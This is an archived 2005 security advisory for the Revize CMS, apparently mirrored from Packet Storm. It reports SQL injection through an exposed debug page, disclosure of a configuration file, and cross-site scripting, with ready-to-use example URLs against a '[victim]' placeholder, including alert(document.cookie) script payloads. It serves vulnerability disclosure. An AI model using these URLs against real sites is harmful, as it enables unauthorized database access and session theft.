Lucene search
revizeSQL.txt
ποΈΒ 20 Nov 2005Β 00:00:00Reported byΒ LostmonTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 20Β Views
The Revize(r) Web Content Management System allows SQL information disclosure and XS
Show more
` #######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url:http://www.idetix.com
Advisore:http://lostmon.blogspot.com/2005/11/
revizer-cms-sql-information-disclosure.html
Vendor notify: exploit available:yes
#######################################################
The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.
The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
This may allow a remote attacker execute or manipulate SQL
queries in the backend database.
a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/
#################
version
#################
unknow version of Revize(r) CMS
##################
solution
##################
No solution at this time.
###################
Timeline
###################
Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005
#######################
examples
#######################
SQL command:
http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE
ΒΏAdmin Bypass ?
http://[Victim]/revize/debug/
wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some
relevant information about the site and we donΒ΄t need a login.
http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html
#####################
cross site scripting
#####################
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp
################### Βnd ############################
thnx to estrella to be my ligth
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo20 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4